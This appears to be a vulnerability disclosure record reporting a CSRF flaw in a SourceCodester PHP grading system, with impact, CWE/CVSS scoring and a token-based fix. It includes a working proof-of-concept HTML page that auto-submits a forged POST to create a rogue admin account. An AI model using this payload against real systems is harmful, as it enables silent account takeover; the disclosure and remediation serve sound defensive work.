| Title | https://www.sourcecodester.com/ CET Automated Grading System with AI Predictive Analytics in PHP and MySQL 1.0 Cross-Site Request Forgery (CSRF) |
|---|
| Description | A Cross-Site Request Forgery (CSRF) vulnerability exists in the
CET AI Predictive Grading System. No CSRF tokens are generated
or verified on any state-changing form in the application including
login, registration, grade submission, user management, student
editing, and deletion endpoints. An attacker can craft a malicious
webpage that silently submits a POST request to the application on
behalf of an authenticated victim without their knowledge or consent.
An attacker can craft a malicious HTML page that automatically
submits a forged POST request to the application on behalf of
an authenticated victim when they visit the attacker's page.
Steps to Reproduce:
1. Victim logs in as admin at:
http://[host]/PersonalAGS/index.php
2. Attacker hosts this malicious page:
<html>
<body>
<form id="csrf"
action="http://[host]/PersonalAGS/index.php"
method="POST">
<input type="hidden" name="add_user" value="1">
<input type="hidden" name="new_username" value="hacker">
<input type="hidden" name="new_password" value="hacked123">
<input type="hidden" name="new_name" value="Hacker">
<input type="hidden" name="new_role" value="admin">
</form>
<script>document.getElementById('csrf').submit();</script>
</body>
</html>
3. Victim visits attacker page while logged in as admin
4. Form auto-submits silently in the background
5. New admin account is created without victim's knowledge
Impact:
- Silent admin account creation
- Unauthorized grade modification
- Student and user account deletion
- Complete takeover of the grading system
Affected File: index.php
Affected Lines: All POST handlers
Auth Required: Yes (victim must be logged in)
User Interaction: Required (victim visits attacker page)
CWE: CWE-352
CVSS: 8.8 (High)
1. Generate a cryptographically random CSRF token per session:
$_SESSION['csrf'] = bin2hex(random_bytes(32));
2. Embed the token as a hidden field in every form:
<input type="hidden" name="csrf_token"
value="<?= $_SESSION['csrf'] ?>">
3. Validate the token on every POST request before processing:
if(!isset($_POST['csrf_token']) ||
$_POST['csrf_token'] !== $_SESSION['csrf']) {
die('CSRF validation failed');
}
4. Regenerate the token after each successful form submission
5. Set SameSite cookie attribute on session cookie:
session_set_cookie_params([
'samesite' => 'Strict',
'secure' => true,
'httponly' => true
]); |
|---|
| Source | ⚠️ https://cwe.mitre.org/data/definitions/352.html |
|---|
| User | Abhay mp (UID 98542) |
|---|
| Submission | 06/01/2026 09:21 (1 month ago) |
|---|
| Moderation | 07/03/2026 15:56 (1 month later) |
|---|
| Status | Duplicate |
|---|
| VulDB entry | 365638 [SourceCodester CET Automated Grading System with AI Predictive Analytics cross-site request forgery] |
|---|
| Points | 0 |
|---|